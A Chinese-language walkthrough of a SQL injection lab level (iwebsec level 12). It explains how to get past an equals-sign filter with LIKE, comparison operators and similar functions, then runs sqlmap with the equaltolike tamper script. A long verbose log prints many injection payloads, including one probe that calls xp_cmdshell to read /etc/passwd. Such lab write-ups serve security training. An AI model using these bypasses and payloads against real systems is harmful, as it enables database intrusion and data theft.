iwebsec靶场 SQL注入漏洞通关笔记12-等价函数替换绕过

news2024/11/6 9:58:34

系列文章目录

iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔型盲注)_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入(报错型盲注)_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记6- 宽字节注入_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记8- 大小写过滤注入_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记9- 双写关键字绕过_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记10- 双重url编码绕过_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记11-16进制编码绕过_mooyuan的博客-CSDN博客


目录

系列文章目录

前言

一、源码分析

二、等号过滤如何解

三、sqlmap注入

1.注入命令

2.完整交互

总结


前言

打开靶场,url为 http://192.168.71.151/sqli/12.php?id=1如下所示

一、源码分析

如下所示,SQL语句与前几关一样,调用的语句为$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";很明显这是一个普通的数字型注入,并且对参数id做了等号=过滤。

 等号=过滤的相关源码如下所示

	if (preg_match('/=/', $_GET["id"])) {
		die("ERROR");
	}

二、等号过滤如何解

(1)like、rlike、regexp替换绕过

like:就是等于的意思,不加通配符的like执行的效果和=一致,所以可以用来绕过
rlike:就是里面含有这个
regexp:和rlike一样,里面含有即可

如select * from users where id =1;可以用select * from users where id like 1;来替换,即如下两个语句同义

select * from users where id = 1;
select * from users where id like 1;

 (2)大于小于号绕过

如id =2 可以用id > 1 and id < 3来替换

select * from users where id = 2;
select * from users where id > 1 and id < 3;

 <> 等价于 != 所以在前面再加一个!结果就是等号了

select * from users where id = 2;
select * from users where !(id <> 1);

(3)between\strcmp等函数替换绕过

等号绕过也可以使用strcmp(str1,str2)函数、between关键字

(4) %like% 通配符

%:替代一个或多个字符

三、sqlmap注入

1.注入命令

使用sqlmap的绕waf脚本equaltolike.py,将=使用like替换

sqlmap -u http://192.168.71.151/sqli/12.php?id=1  --current-db --dump --batch --tamper equaltolike.py

2.完整交互

这里为了将equaltolike.py的作用完整显示出来,附上-v 3的完整交互信息,如下所示

kali@kali:/usr/share/sqlmap/tamper$ sqlmap -u http://192.168.71.151/sqli/12.php?id=1  --current-db --dump --batch --tamper equaltolike.py -v 3
        ___
       __H__                                                                                                                                                                                                                               
 ___ ___[.]_____ ___ ___  {1.5.11#stable}                                                                                                                                                                                                  
|_ -| . [.]     | .'| . |                                                                                                                                                                                                                  
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:12:54 /2022-11-25/

[09:12:54] [DEBUG] cleaning up configuration parameters
[09:12:54] [INFO] loading tamper module 'equaltolike'
[09:12:54] [DEBUG] setting the HTTP timeout
[09:12:54] [DEBUG] setting the HTTP User-Agent header
[09:12:54] [DEBUG] creating HTTP requests opener object
[09:12:54] [INFO] testing connection to the target URL
[09:12:54] [DEBUG] declared web page charset 'utf-8'
[09:12:55] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:12:55] [PAYLOAD] 8768 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
[09:12:55] [INFO] testing if the target URL content is stable
[09:12:55] [INFO] target URL content is stable
[09:12:55] [INFO] testing if GET parameter 'id' is dynamic
[09:12:55] [PAYLOAD] 8882
[09:12:55] [WARNING] GET parameter 'id' does not appear to be dynamic
[09:12:55] [PAYLOAD] 1((.'.("()(
[09:12:55] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:12:55] [PAYLOAD] 1'FWtgtm<'">vpDcDk
[09:12:55] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:12:55] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[09:12:55] [DEBUG] used the default behavior, running in batch mode
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[09:12:55] [DEBUG] used the default behavior, running in batch mode
[09:12:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:12:55] [PAYLOAD] 1
[09:12:55] [PAYLOAD] 1) AND 3822 LIKE 4588 AND (7774 LIKE 7774
[09:12:55] [WARNING] reflective value(s) found and filtering out
[09:12:55] [PAYLOAD] 1) AND 5230 LIKE 5230 AND (5756 LIKE 5756
[09:12:55] [PAYLOAD] 1 AND 2136 LIKE 4399
[09:12:55] [PAYLOAD] 1 AND 5230 LIKE 5230
[09:12:55] [PAYLOAD] 1 AND 4840 LIKE 9205
[09:12:55] [PAYLOAD] 1 AND 8078 LIKE 6290-- eroG
[09:12:55] [PAYLOAD] 1 AND 5230 LIKE 5230-- UAvw
[09:12:55] [PAYLOAD] 1 AND 8228 LIKE 8711-- pygw
[09:12:55] [PAYLOAD] 1') AND 4201 LIKE 9250 AND ('Jzes' LIKE 'Jzes
[09:12:55] [PAYLOAD] 1') AND 5230 LIKE 5230 AND ('OMXc' LIKE 'OMXc
[09:12:55] [PAYLOAD] 1' AND 9717 LIKE 9200 AND 'sRxI' LIKE 'sRxI
[09:12:55] [PAYLOAD] 1' AND 5230 LIKE 5230 AND 'edhr' LIKE 'edhr
[09:12:55] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause' because the risk (3) is higher than the provided (1)
[09:12:55] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT)' because the risk (3) is higher than the provided (1)
[09:12:55] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' because the level (2) is higher than the provided (1)
[09:12:55] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)' because the risk (3) is higher than the provided (1)
[09:12:55] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (comment)' because the level (2) is higher than the provided (1)
[09:12:55] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (comment)' because the risk (3) is higher than the provided (1)
[09:12:55] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)' because the risk (3) is higher than the provided (1)
[09:12:55] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:12:55] [PAYLOAD] (SELECT (CASE WHEN (8810 LIKE 4602) THEN 1 ELSE (SELECT 4602 UNION SELECT 1328) END))
[09:12:55] [DEBUG] setting match ratio for current parameter to 0.971
[09:12:55] [PAYLOAD] (SELECT (CASE WHEN (9771 LIKE 9771) THEN 1 ELSE (SELECT 2364 UNION SELECT 5247) END))
[09:12:55] [PAYLOAD] (SELECT (CASE WHEN (9692 LIKE 3505) THEN 1 ELSE (SELECT 3505 UNION SELECT 2047) END))
[09:12:55] [INFO] GET parameter 'id' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --string="age")
[09:12:55] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (DUAL)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (DUAL - original value)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (CASE)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (CASE - original value)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'HAVING boolean-based blind - WHERE, GROUP BY clause' because the payload for boolean-based blind has already been identified
[09:12:55] [INFO] testing 'Generic inline queries'
[09:12:55] [PAYLOAD] (SELECT CONCAT(CONCAT(0x7176787171,(CASE WHEN (7110 LIKE 7110) THEN 0x31 ELSE 0x30 END)),0x7176767171))
[09:12:55] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT - original value)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (bool*int)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (bool*int - original value)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[09:12:55] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[09:12:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:12:55] [PAYLOAD] 1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176787171,(SELECT (ELT(2376 LIKE 2376,1))),0x7176767171,0x78))s), 8446744073709551610, 8446744073709551610)))
[09:12:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:12:55] [PAYLOAD] 1 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176787171,(SELECT (ELT(3665 LIKE 3665,1))),0x7176767171,0x78))s), 8446744073709551610, 8446744073709551610)))
[09:12:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:12:55] [PAYLOAD] 1 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7176787171,(SELECT (ELT(6354 LIKE 6354,1))),0x7176767171,0x78))x))
[09:12:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:12:55] [PAYLOAD] 1 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7176787171,(SELECT (ELT(6771 LIKE 6771,1))),0x7176767171,0x78))x))
[09:12:55] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:12:55] [PAYLOAD] 1 AND GTID_SUBSET(CONCAT(0x7176787171,(SELECT (ELT(3934 LIKE 3934,1))),0x7176767171),3934)
[09:12:55] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:12:55] [PAYLOAD] 1 OR GTID_SUBSET(CONCAT(0x7176787171,(SELECT (ELT(5781 LIKE 5781,1))),0x7176767171),5781)
[09:12:55] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:12:55] [PAYLOAD] 1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7176787171,(SELECT (ELT(1448 LIKE 1448,1))),0x7176767171)) USING utf8)))
[09:12:56] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:12:56] [PAYLOAD] 1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7176787171,(SELECT (ELT(2021 LIKE 2021,1))),0x7176767171)) USING utf8)))
[09:12:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:12:56] [PAYLOAD] 1 AND (SELECT 4063 FROM(SELECT COUNT(*),CONCAT(0x7176787171,(SELECT (ELT(4063 LIKE 4063,1))),0x7176767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
[09:12:56] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.5 error-based - Parameter replace (EXP)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)' because the payload for error-based has already been identified
[09:12:56] [DEBUG] skipping test 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[09:12:56] [INFO] testing 'MySQL inline queries'
[09:12:56] [PAYLOAD] (SELECT CONCAT(0x7176787171,(ELT(5323 LIKE 5323,1)),0x7176767171))
[09:12:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:12:56] [PAYLOAD] > LIKE 5.0
[09:12:56] [PAYLOAD] 1;SELECT SLEEP(5)#
[09:12:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:12:56] [PAYLOAD] 1;SELECT SLEEP(5)
[09:12:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:12:56] [PAYLOAD] 1;(SELECT * FROM (SELECT(SLEEP(5)))EhJs)#
[09:12:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:12:56] [PAYLOAD] 1;(SELECT * FROM (SELECT(SLEEP(5)))nErv)
[09:12:56] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:12:56] [PAYLOAD] 1;SELECT BENCHMARK(5000000,MD5(0x4d584155))#
[09:12:56] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:12:56] [PAYLOAD] 1;SELECT BENCHMARK(5000000,MD5(0x46774b7a))
[09:12:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:12:56] [PAYLOAD] 1 AND (SELECT 6421 FROM (SELECT(SLEEP(5)))KXRK)
[09:13:01] [PAYLOAD] 1 AND (SELECT 6421 FROM (SELECT(SLEEP(0)))KXRK)
[09:13:01] [PAYLOAD] 1 AND (SELECT 6421 FROM (SELECT(SLEEP(5)))KXRK)
[09:13:06] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (SLEEP)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (SLEEP)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL AND time-based blind (ELT)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL OR time-based blind (ELT)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL AND time-based blind (ELT - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL OR time-based blind (ELT - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - Parameter replace' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (bool)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (ELT)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (MAKE_SET)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Informix boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Informix boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY clause (original value)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'IBM DB2 boolean-based blind - ORDER BY clause' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'IBM DB2 boolean-based blind - ORDER BY clause (original value)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified
